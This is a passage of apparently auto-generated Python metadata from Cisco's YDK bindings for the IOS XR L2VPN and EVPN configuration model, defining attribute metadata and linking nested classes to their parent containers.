'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
# Wire each nested class's meta-info to the meta-info of its enclosing
# container, so the generated model hierarchy can be walked upward
# (child -> parent). Pairs are (child path, parent path) keys into
# _meta_table; assignments run in the same order as the generator emits them.
_parent_links = [
    ('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
     'L2Vpn.PwRouting.PwRoutingBgp'),
    ('L2Vpn.PwRouting.PwRoutingBgp',
     'L2Vpn.PwRouting'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
     'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
     'L2Vpn.Database.G8032Rings.G8032Ring'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
     'L2Vpn.Database.G8032Rings.G8032Ring'),
    ('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
     'L2Vpn.Database.G8032Rings.G8032Ring'),
    ('L2Vpn.Database.G8032Rings.G8032Ring',
     'L2Vpn.Database.G8032Rings'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire'),
    ('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
     'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires'),
]
for _child_path, _parent_path in _parent_links:
    _meta_table[_child_path]['meta_info'].parent = _meta_table[_parent_path]['meta_info']
del _parent_links
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
